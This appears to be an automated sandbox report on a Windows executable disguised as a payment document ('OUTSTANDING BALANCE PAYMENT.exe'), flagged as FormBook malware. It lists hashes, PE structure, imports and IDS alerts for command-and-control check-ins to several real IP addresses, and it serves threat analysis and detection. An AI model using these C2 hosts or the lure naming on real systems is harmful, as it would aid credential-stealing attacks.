                                                        Size (bytes):196608
                                                        Entropy (8bit):1.121297215059106
                                                        Encrypted:false
                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.164022217879809
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:OUTSTANDING BALANCE PAYMENT.exe
                                                        File size:1'230'336 bytes
                                                        MD5:981e91572b25bce71c737bae5d1a2363
                                                        SHA1:a6c95d1a650270d13e749a2a57c3e530cecc8945
                                                        SHA256:9a962fa4cb6a7d760e8d7fa56996169d0e66f2897a2b331edefb6766ad756bb4
                                                        SHA512:81fa86f43f8682235c3500f6026e1f3ae035e6145d9af3750469e8fdd883f9d98f8ef6f813e31275383fe78c95be625f669baa6b3c10e5ceb31755b1c2fff6c4
                                                        SSDEEP:24576:Jtb20pkaCqT5TBWgNQ7ab3dnHdQmSG6Fv9/U6A:aVg5tQ7ab3dnHdHB6FFc5
                                                        TLSH:A545D02373DE8361C7B25273BA56B701BE7F782506A1F56B2FD4093DE920122521EA73
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                        Icon Hash:aaf3e3e3938382a0
                                                        Entrypoint:0x425f74
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6747BD8D [Thu Nov 28 00:47:09 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                        Instruction
                                                        call 00007FEDC4B76D6Fh
                                                        jmp 00007FEDC4B69D84h
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007FEDC4B69F0Ah
                                                        cmp edi, eax
                                                        jc 00007FEDC4B6A26Eh
                                                        bt dword ptr [004C0158h], 01h
                                                        jnc 00007FEDC4B69F09h
                                                        rep movsb
                                                        jmp 00007FEDC4B6A21Ch
                                                        cmp ecx, 00000080h
                                                        jc 00007FEDC4B6A0D4h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007FEDC4B69F10h
                                                        bt dword ptr [004BA370h], 01h
                                                        jc 00007FEDC4B6A3E0h
                                                        bt dword ptr [004C0158h], 00000000h
                                                        jnc 00007FEDC4B6A0ADh
                                                        test edi, 00000003h
                                                        jne 00007FEDC4B6A0BEh
                                                        test esi, 00000003h
                                                        jne 00007FEDC4B6A09Dh
                                                        bt edi, 02h
                                                        jnc 00007FEDC4B69F0Fh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007FEDC4B69F13h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007FEDC4B69F65h
                                                        bt esi, 03h
                                                        jnc 00007FEDC4B69FB8h
                                                        movdqa xmm1, dqword ptr [esi+00h]
                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2012 UPD4 build 61030
                                                        • [RES] VS2012 UPD4 build 61030
                                                        • [LNK] VS2012 UPD4 build 61030
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x6342c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1280000x6c4c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xc40000x6342c0x63600d925c92a866feb0d6e2a0b8e9c654396False0.9334365172955975data7.90704547691612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1280000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                        RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xcc7b80x5a733data1.000326600680733
                                                        RT_GROUP_ICON0x126eec0x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x126f640x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0x126f780x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x126f8c0x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x126fa00xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x12707c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                        DLLImport
                                                        WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                        USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                        USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                        GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                        ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                        OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-28T09:27:57.078520+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549742161.97.168.24580TCP
                                                        2024-11-28T09:27:57.078520+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549742161.97.168.24580TCP
                                                        2024-11-28T09:28:14.446845+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549780202.79.161.15180TCP
                                                        2024-11-28T09:28:17.071740+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549786202.79.161.15180TCP
                                                        2024-11-28T09:28:19.837437+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549794202.79.161.15180TCP
                                                        2024-11-28T09:28:22.509221+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549802202.79.161.15180TCP
                                                        2024-11-28T09:28:22.509221+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549802202.79.161.15180TCP
                                                        2024-11-28T09:28:30.368632+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549819149.88.81.19080TCP
                                                        2024-11-28T09:28:33.040990+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549827149.88.81.19080TCP
                                                        2024-11-28T09:28:35.701607+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549833149.88.81.19080TCP
                                                        2024-11-28T09:28:58.778775+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549839149.88.81.19080TCP
                                                        2024-11-28T09:28:58.778775+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549839149.88.81.19080TCP
                                                        2024-11-28T09:29:06.681116+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54989885.159.66.9380TCP
                                                        2024-11-28T09:29:09.337387+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54990685.159.66.9380TCP
                                                        2024-11-28T09:29:11.993694+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54991185.159.66.9380TCP
                                                        2024-11-28T09:29:14.565776+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54991985.159.66.9380TCP
                                                        2024-11-28T09:29:14.565776+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54991985.159.66.9380TCP
                                                        2024-11-28T09:29:21.578452+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549935185.27.134.14480TCP
                                                        2024-11-28T09:29:24.272227+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549942185.27.134.14480TCP
                                                        2024-11-28T09:29:27.126140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549948185.27.134.14480TCP
                                                        2024-11-28T09:29:29.874737+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549956185.27.134.14480TCP
                                                        2024-11-28T09:29:29.874737+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549956185.27.134.14480TCP
                                                        2024-11-28T09:29:37.087617+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549972104.21.95.16080TCP
                                                        2024-11-28T09:29:39.515162+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549979104.21.95.16080TCP
                                                        2024-11-28T09:29:42.118334+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549985104.21.95.16080TCP
                                                        2024-11-28T09:29:44.853284+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549990104.21.95.16080TCP
                                                        2024-11-28T09:29:44.853284+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549990104.21.95.16080TCP
                                                        2024-11-28T09:29:51.800817+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550000104.21.57.24880TCP
                                                        2024-11-28T09:29:54.465595+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550001104.21.57.24880TCP
                                                        2024-11-28T09:29:57.025271+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550002104.21.57.24880TCP
                                                        2024-11-28T09:29:59.720886+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550003104.21.57.24880TCP
                                                        2024-11-28T09:29:59.720886+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550003104.21.57.24880TCP
                                                        2024-11-28T09:30:06.946714+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550004154.88.22.10180TCP
                                                        2024-11-28T09:30:09.618557+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005154.88.22.10180TCP
                                                        2024-11-28T09:30:12.274786+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550006154.88.22.10180TCP
                                                        2024-11-28T09:30:14.923216+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550007154.88.22.10180TCP
                                                        2024-11-28T09:30:14.923216+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550007154.88.22.10180TCP
                                                        2024-11-28T09:30:22.056204+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550008209.74.77.10780TCP
                                                        2024-11-28T09:30:24.718729+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009209.74.77.10780TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 28, 2024 09:27:55.661137104 CET4974280192.168.2.5161.97.168.245
                                                        Nov 28, 2024 09:27:55.782730103 CET8049742161.97.168.245192.168.2.5
                                                        Nov 28, 2024 09:27:55.782969952 CET4974280192.168.2.5161.97.168.245
                                                        Nov 28, 2024 09:27:55.792651892 CET4974280192.168.2.5161.97.168.245
                                                        Nov 28, 2024 09:27:55.912766933 CET8049742161.97.168.245192.168.2.5
                                                        Nov 28, 2024 09:27:57.078223944 CET8049742161.97.168.245192.168.2.5
                                                        Nov 28, 2024 09:27:57.078383923 CET8049742161.97.168.245192.168.2.5
                                                        Nov 28, 2024 09:27:57.078397036 CET8049742161.97.168.245192.168.2.5
                                                        Nov 28, 2024 09:27:57.078520060 CET4974280192.168.2.5161.97.168.245
                                                        Nov 28, 2024 09:27:57.078900099 CET8049742161.97.168.245192.168.2.5
                                                        Nov 28, 2024 09:27:57.078910112 CET8049742161.97.168.245192.168.2.5
                                                        Nov 28, 2024 09:27:57.078953981 CET4974280192.168.2.5161.97.168.245
                                                        Nov 28, 2024 09:27:57.083852053 CET4974280192.168.2.5161.97.168.245
                                                        Nov 28, 2024 09:27:57.204492092 CET8049742161.97.168.245192.168.2.5
                                                        Nov 28, 2024 09:28:12.829977989 CET4978080192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:12.950028896 CET8049780202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:12.950128078 CET4978080192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:12.965143919 CET4978080192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:13.085158110 CET8049780202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:14.393183947 CET8049780202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:14.446845055 CET4978080192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:14.478070021 CET4978080192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:15.540035963 CET4978680192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:15.659970999 CET8049786202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:15.660048008 CET4978680192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:15.683224916 CET4978680192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:15.803262949 CET8049786202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:17.019881010 CET8049786202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:17.071739912 CET4978680192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:17.196876049 CET4978680192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:17.212074041 CET8049786202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:17.212152004 CET4978680192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:18.290812969 CET4979480192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:18.410814047 CET8049794202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:18.414710999 CET4979480192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:18.435781956 CET4979480192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:18.556016922 CET8049794202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:18.556030035 CET8049794202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:19.791860104 CET8049794202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:19.837436914 CET4979480192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:19.946803093 CET4979480192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:19.993395090 CET8049794202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:19.993484020 CET4979480192.168.2.5202.79.161.151
